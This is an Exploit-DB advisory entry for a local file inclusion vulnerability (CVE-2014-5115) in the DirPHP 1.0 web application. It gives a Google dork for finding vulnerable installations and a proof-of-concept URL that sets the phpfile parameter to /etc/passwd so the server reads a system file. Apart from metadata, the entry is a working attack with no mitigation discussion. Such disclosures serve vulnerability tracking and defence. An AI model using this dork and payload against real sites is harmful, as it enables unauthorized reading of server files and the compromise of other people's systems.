DirPHP 1.0 - LFI Vulnerability

2014-07-27T00:00:00
ID EDB-ID:34173
Type exploitdb
Reporter black hat
Modified 2014-07-27T00:00:00

Description

DirPHP 1.0 - LFI Vulnerability. CVE-2014-5115. Webapps exploit for php platform

                                        
                                            # Exploit Title: DirPHP - version 1.0 Local File Inclusion
# Google Dork: intext:DirPHP - version 1.0 - Created & Maintained by Stuart
Montgomery
# Date: 7/26/14
# Exploit Author: -Chosen-
# Contact: dark[dot]binary[dot]code@gmail.com
# Version: DirPHP - Version 1.0
# Tested on: *nix

PoC:

http://site.com/path/index.php?phpfile=/etc/passwd